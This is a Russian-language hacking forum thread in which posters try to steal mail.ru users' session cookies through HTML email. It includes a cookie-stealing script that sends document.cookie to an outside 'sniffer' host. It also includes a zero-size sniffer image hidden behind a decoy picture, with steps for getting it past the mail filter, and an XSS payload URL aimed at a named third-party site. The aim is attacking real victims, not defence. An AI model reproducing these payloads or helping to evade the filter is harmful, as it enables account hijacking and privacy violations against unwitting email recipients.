Проблема в слудюещем:
Я отправляю на почту жертвы (mail.ru) HTML-файл, в котором размещен скрипт для кражи куки
<script>img = new Image(); img.src = "http://путь к снифферу"+document.cookie;</script>
и когда жертва открывает письмо, то видит следующее:
http://pic.ipicture.ru/uploads/090520/thumbs/2UdqBz5DRB.jpg (http://ipicture.ru/Gallery/Viewfull/19169032.html)
И резко передумывает открывать HTML-файл, как мне избежать этой красной предупредительной надписи?

а как ты думаеш? ето и есть уже защита mail.ru
толк разришать уязвимость им нет.

шифруй
правда может быть все шифровки они пропалили на маиле

Кто то может ответить навернека что конкретно и ка нужно сделать, и не флудить!
ЗЫ:
2 diznt
ссылка на сниффер закодирована!

они javaScript блокируют!

На mail.ru ничего не сделаеш. Там защита и ее х*й обойдеш. Или мирись с этой табличкой или отправляй на другое мыло :)

эту защиту несколько дней назад только поставили, до этого все отправлялось, только тогда все в новом окне открывалось. если раньше как то обходили то и сейчас можно, вопрос времени.

есть у меня система одна но она вроде куки не ворует но на лог рефер выводит, + все происходит когда жертва открывает письмо мб кому пригодится,
(только репу не понижать если х%р%ю напишу хD)

//в имаге сорс устанавливаем путь к картинке сниффера <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:0px; height:0px; z-index:0"><img src="http://*****/sniff/s.gif?id=1728&"+document.cookie; border=0 width=0 height=0></div> //в имаге сорс устанавливаем путь к картинке обычной <div id="image2" style="position:absolute; overflow:hidden; left:0px; top:0px; width:100px; height:100px; z-index:1"><img src="http://*****/img/ganibal.jpg" border=0 width=100 height=100></div>

+пишем письмо в "обычном режиме" жмем расширенный, отправляем письмо в черновик, пишим кому, пишим тему, отправляем.

самое интересное что этот хтмл код не фильтруется, в итоге жертве приходит письмо с картинкой, в моем случае это был ганибал (100x100) как вы поняли, жертва видит картинку и лог у нас уже на сниффе, почему нужна картинка?

ибо если мы пошлем только картинку от снифа то чаще всего ее не видно а видно рамку изображения, что есстественно напугает "дичь", а так все красиво все рульно, можете еще оформить для красоты )

Ворует ли куки?

Нет, но можно попытатся замутить ченить.

а джава причем? если даже хреф ссылки иногда блокирует

у меня опера, мозила, ие )

не фильтрует, потому что там нет джавы!!!
ЗЫ: у тя опера?

Что-то все жгут в данном топике. Всё просто - нет активной xss, знач не видать вам яваскрипта и не видать куков. Такой код мог не блочиться только наверное в первый месяц появления mail.ru, он примитивный и сейчас каждый почтовик его будет блочить. Не знаю как раньше вообще такой код мог проходить фильтр.

та да =) бросайте это дело и го пентагон ломать

аффтор а это те иди ломай http://www.womandoctor.ru/search_file.php?search_string_file=%3CIMG%20%22%22 %22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E%22%3E

хD

=)